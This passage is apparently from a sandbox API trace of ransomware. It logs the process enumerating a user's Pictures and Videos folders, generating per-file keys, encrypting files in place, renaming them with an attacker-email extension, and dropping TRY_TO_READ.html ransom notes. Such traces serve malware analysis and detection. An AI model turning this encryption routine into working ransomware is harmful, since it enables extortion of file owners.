lpNumberOfBytesRead=0x2acf9c8*=0x163b2, lpOverlapped=0x0) returned 1 [0167.587] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363a50 | out: pbBuffer=0x363a50) returned 1 [0167.587] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383db0 | out: pbBuffer=0x383db0) returned 1 [0167.588] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\kCH59RWaoO\\e0R8-ZEhcP.bmp", dwFileAttributes=0x80) returned 1 [0167.588] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\kCH59RWaoO\\e0R8-ZEhcP.bmp") returned 65 [0167.588] GetProcessHeap () returned 0x2e0000 [0167.588] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xe8) returned 0x3ac518 [0167.588] lstrcpyW (in: lpString1=0x3ac518, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\kCH59RWaoO\\e0R8-ZEhcP.bmp" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\kCH59RWaoO\\e0R8-ZEhcP.bmp") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\kCH59RWaoO\\e0R8-ZEhcP.bmp" [0167.588] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\kCH59RWaoO\\e0R8-ZEhcP.bmp", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\kCH59RWaoO\\e0R8-ZEhcP.bmp.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\kCH59RWaoO\\e0R8-ZEhcP.bmp.12781717671972518758.ex_parvis@aol.com.AIR" [0167.588] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\kCH59RWaoO\\e0R8-ZEhcP.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\kch59rwaoo\\e0r8-zehcp.bmp"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\kCH59RWaoO\\e0R8-ZEhcP.bmp.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\kch59rwaoo\\e0r8-zehcp.bmp.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0167.590] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\kCH59RWaoO\\e0R8-ZEhcP.bmp.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\kch59rwaoo\\e0r8-zehcp.bmp.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x560 [0167.590] GetProcessHeap () returned 0x2e0000 [0167.590] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3ac518 | out: hHeap=0x2e0000) returned 1 [0167.590] GetFileSizeEx (in: hFile=0x560, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=68011) returned 1 [0167.590] SetFilePointer (in: hFile=0x560, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0x109ab [0167.590] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0167.590] GetProcessHeap () returned 0x2e0000 [0167.590] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363b58 [0167.590] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0167.590] WriteFile (in: hFile=0x560, lpBuffer=0x363b58*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363b58*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0167.591] WriteFile (in: hFile=0x560, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0167.591] WriteFile (in: hFile=0x560, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0167.592] ReadFile (in: hFile=0x560, lpBuffer=0x3b2410, nNumberOfBytesToRead=0x109ab, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x3b2410*, lpNumberOfBytesRead=0x2acf9c8*=0x109ab, lpOverlapped=0x0) returned 1 [0167.592] SetFilePointer (in: hFile=0x560, lDistanceToMove=-68011, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0167.592] WriteFile (in: hFile=0x560, lpBuffer=0x3c2dc8*, nNumberOfBytesToWrite=0x109ab, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x3c2dc8*, lpNumberOfBytesWritten=0x2acf9c8*=0x109ab, lpOverlapped=0x0) returned 1 [0167.592] FindFirstFileW (in: lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\T8HaqB\\*", lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe205650, ftCreationTime.dwHighDateTime=0x1d4d2b9, ftLastAccessTime.dwLowDateTime=0xb16d7ef0, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0xb16d7ef0, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3b1a68 [0167.593] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\T8HaqB\\a-4NWRez\\TRY_TO_READ.html" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\t8haqb\\a-4nwrez\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x564 [0167.594] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\T8HaqB\\lHklJjXmqiQDclKJYe\\TRY_TO_READ.html" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\t8haqb\\lhkljjxmqiqdclkjye\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x564 [0167.595] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363a50 | out: pbBuffer=0x363a50) returned 1 [0167.596] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383db0 | out: pbBuffer=0x383db0) returned 1 [0167.596] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\T8HaqB\\nBSm5k9.jpg", dwFileAttributes=0x80) returned 1 [0167.596] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\T8HaqB\\nBSm5k9.jpg") returned 58 [0167.596] GetProcessHeap () returned 0x2e0000 [0167.596] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xda) returned 0x3a7428 [0167.596] lstrcpyW (in: lpString1=0x3a7428, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\T8HaqB\\nBSm5k9.jpg" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\T8HaqB\\nBSm5k9.jpg") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\T8HaqB\\nBSm5k9.jpg" [0167.596] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\T8HaqB\\nBSm5k9.jpg", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\T8HaqB\\nBSm5k9.jpg.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\T8HaqB\\nBSm5k9.jpg.12781717671972518758.ex_parvis@aol.com.AIR" [0167.596] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\T8HaqB\\nBSm5k9.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\t8haqb\\nbsm5k9.jpg"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\T8HaqB\\nBSm5k9.jpg.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\t8haqb\\nbsm5k9.jpg.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0167.599] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\T8HaqB\\nBSm5k9.jpg.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\t8haqb\\nbsm5k9.jpg.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x564 [0167.599] GetProcessHeap () returned 0x2e0000 [0167.599] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3a7428 | out: hHeap=0x2e0000) returned 1 [0167.599] GetFileSizeEx (in: hFile=0x564, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=3146) returned 1 [0167.599] SetFilePointer (in: hFile=0x564, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0xc4a [0167.599] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0167.599] GetProcessHeap () returned 0x2e0000 [0167.599] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363b58 [0167.599] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0167.599] WriteFile (in: hFile=0x564, lpBuffer=0x363b58*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363b58*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0167.600] WriteFile (in: hFile=0x564, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0167.600] WriteFile (in: hFile=0x564, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0167.600] ReadFile (in: hFile=0x564, lpBuffer=0x31d01e0, nNumberOfBytesToRead=0xc4a, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x31d01e0*, lpNumberOfBytesRead=0x2acf9c8*=0xc4a, lpOverlapped=0x0) returned 1 [0167.600] SetFilePointer (in: hFile=0x564, lDistanceToMove=-3146, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0167.600] WriteFile (in: hFile=0x564, lpBuffer=0x30f0048*, nNumberOfBytesToWrite=0xc4a, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x30f0048*, lpNumberOfBytesWritten=0x2acf9c8*=0xc4a, lpOverlapped=0x0) returned 1 [0167.600] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363a50 | out: pbBuffer=0x363a50) returned 1 [0167.600] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383db0 | out: pbBuffer=0x383db0) returned 1 [0167.600] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\T8HaqB\\dDIoIJ.jpg", dwFileAttributes=0x80) returned 1 [0167.601] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\T8HaqB\\dDIoIJ.jpg") returned 57 [0167.601] GetProcessHeap () returned 0x2e0000 [0167.601] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xd8) returned 0x336dd8 [0167.601] lstrcpyW (in: lpString1=0x336dd8, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\T8HaqB\\dDIoIJ.jpg" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\T8HaqB\\dDIoIJ.jpg") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\T8HaqB\\dDIoIJ.jpg" [0167.601] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\T8HaqB\\dDIoIJ.jpg", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\T8HaqB\\dDIoIJ.jpg.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\T8HaqB\\dDIoIJ.jpg.12781717671972518758.ex_parvis@aol.com.AIR" [0167.601] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\T8HaqB\\dDIoIJ.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\t8haqb\\ddioij.jpg"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\T8HaqB\\dDIoIJ.jpg.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\t8haqb\\ddioij.jpg.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0167.603] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\T8HaqB\\dDIoIJ.jpg.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\t8haqb\\ddioij.jpg.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x564 [0167.603] GetProcessHeap () returned 0x2e0000 [0167.603] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x336dd8 | out: hHeap=0x2e0000) returned 1 [0167.603] GetFileSizeEx (in: hFile=0x564, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=56862) returned 1 [0167.603] SetFilePointer (in: hFile=0x564, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0xde1e [0167.603] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0167.603] GetProcessHeap () returned 0x2e0000 [0167.603] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363b58 [0167.603] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0167.604] WriteFile (in: hFile=0x564, lpBuffer=0x363b58*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363b58*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0167.604] WriteFile (in: hFile=0x564, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0167.604] WriteFile (in: hFile=0x564, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0167.605] ReadFile (in: hFile=0x564, lpBuffer=0x3b2410, nNumberOfBytesToRead=0xde1e, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x3b2410*, lpNumberOfBytesRead=0x2acf9c8*=0xde1e, lpOverlapped=0x0) returned 1 [0167.605] SetFilePointer (in: hFile=0x564, lDistanceToMove=-56862, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0167.605] WriteFile (in: hFile=0x564, lpBuffer=0x3c0238*, nNumberOfBytesToWrite=0xde1e, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x3c0238*, lpNumberOfBytesWritten=0x2acf9c8*=0xde1e, lpOverlapped=0x0) returned 1 [0167.605] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363a50 | out: pbBuffer=0x363a50) returned 1 [0167.605] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383db0 | out: pbBuffer=0x383db0) returned 1 [0167.605] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\T8HaqB\\55NgGQ5.jpg", dwFileAttributes=0x80) returned 1 [0167.606] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\T8HaqB\\55NgGQ5.jpg") returned 58 [0167.606] GetProcessHeap () returned 0x2e0000 [0167.606] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xda) returned 0x3a7428 [0167.606] lstrcpyW (in: lpString1=0x3a7428, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\T8HaqB\\55NgGQ5.jpg" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\T8HaqB\\55NgGQ5.jpg") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\T8HaqB\\55NgGQ5.jpg" [0167.606] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\T8HaqB\\55NgGQ5.jpg", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\T8HaqB\\55NgGQ5.jpg.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\T8HaqB\\55NgGQ5.jpg.12781717671972518758.ex_parvis@aol.com.AIR" [0167.606] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\T8HaqB\\55NgGQ5.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\t8haqb\\55nggq5.jpg"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\T8HaqB\\55NgGQ5.jpg.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\t8haqb\\55nggq5.jpg.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0167.609] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\T8HaqB\\55NgGQ5.jpg.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\t8haqb\\55nggq5.jpg.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x564 [0167.609] GetProcessHeap () returned 0x2e0000 [0167.609] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3a7428 | out: hHeap=0x2e0000) returned 1 [0167.609] GetFileSizeEx (in: hFile=0x564, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=29285) returned 1 [0167.609] SetFilePointer (in: hFile=0x564, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0x7265 [0167.609] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0167.609] GetProcessHeap () returned 0x2e0000 [0167.609] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363b58 [0167.609] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0167.609] WriteFile (in: hFile=0x564, lpBuffer=0x363b58*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363b58*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0167.610] WriteFile (in: hFile=0x564, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0167.610] WriteFile (in: hFile=0x564, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0167.610] ReadFile (in: hFile=0x564, lpBuffer=0x3b2410, nNumberOfBytesToRead=0x7265, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x3b2410*, lpNumberOfBytesRead=0x2acf9c8*=0x7265, lpOverlapped=0x0) returned 1 [0167.611] SetFilePointer (in: hFile=0x564, lDistanceToMove=-29285, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0167.611] WriteFile (in: hFile=0x564, lpBuffer=0x3b9680*, nNumberOfBytesToWrite=0x7265, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x3b9680*, lpNumberOfBytesWritten=0x2acf9c8*=0x7265, lpOverlapped=0x0) returned 1 [0167.612] FindFirstFileW (in: lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\4n2w9OY8gpEd9N\\*", lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x58e57870, ftCreationTime.dwHighDateTime=0x1d4ce0c, ftLastAccessTime.dwLowDateTime=0xb17965d0, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0xb17965d0, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3b1aa8 [0167.612] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363a50 | out: pbBuffer=0x363a50) returned 1 [0167.612] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383db0 | out: pbBuffer=0x383db0) returned 1 [0167.613] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\4n2w9OY8gpEd9N\\QJZVU5bhVn bE3Tk.flv", dwFileAttributes=0x80) returned 1 [0167.613] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\4n2w9OY8gpEd9N\\QJZVU5bhVn bE3Tk.flv") returned 73 [0167.613] GetProcessHeap () returned 0x2e0000 [0167.613] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xf8) returned 0x31fae0 [0167.613] lstrcpyW (in: lpString1=0x31fae0, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\4n2w9OY8gpEd9N\\QJZVU5bhVn bE3Tk.flv" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\4n2w9OY8gpEd9N\\QJZVU5bhVn bE3Tk.flv") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\4n2w9OY8gpEd9N\\QJZVU5bhVn bE3Tk.flv" [0167.613] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\4n2w9OY8gpEd9N\\QJZVU5bhVn bE3Tk.flv", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\4n2w9OY8gpEd9N\\QJZVU5bhVn bE3Tk.flv.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\4n2w9OY8gpEd9N\\QJZVU5bhVn bE3Tk.flv.12781717671972518758.ex_parvis@aol.com.AIR" [0167.613] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\4n2w9OY8gpEd9N\\QJZVU5bhVn bE3Tk.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\4n2w9oy8gped9n\\qjzvu5bhvn be3tk.flv"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\4n2w9OY8gpEd9N\\QJZVU5bhVn bE3Tk.flv.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\4n2w9oy8gped9n\\qjzvu5bhvn be3tk.flv.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0167.617] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\4n2w9OY8gpEd9N\\QJZVU5bhVn bE3Tk.flv.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\4n2w9oy8gped9n\\qjzvu5bhvn be3tk.flv.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x568 [0167.617] GetProcessHeap () returned 0x2e0000 [0167.617] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x31fae0 | out: hHeap=0x2e0000) returned 1 [0167.617] GetFileSizeEx (in: hFile=0x568, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=51639) returned 1 [0167.618] SetFilePointer (in: hFile=0x568, 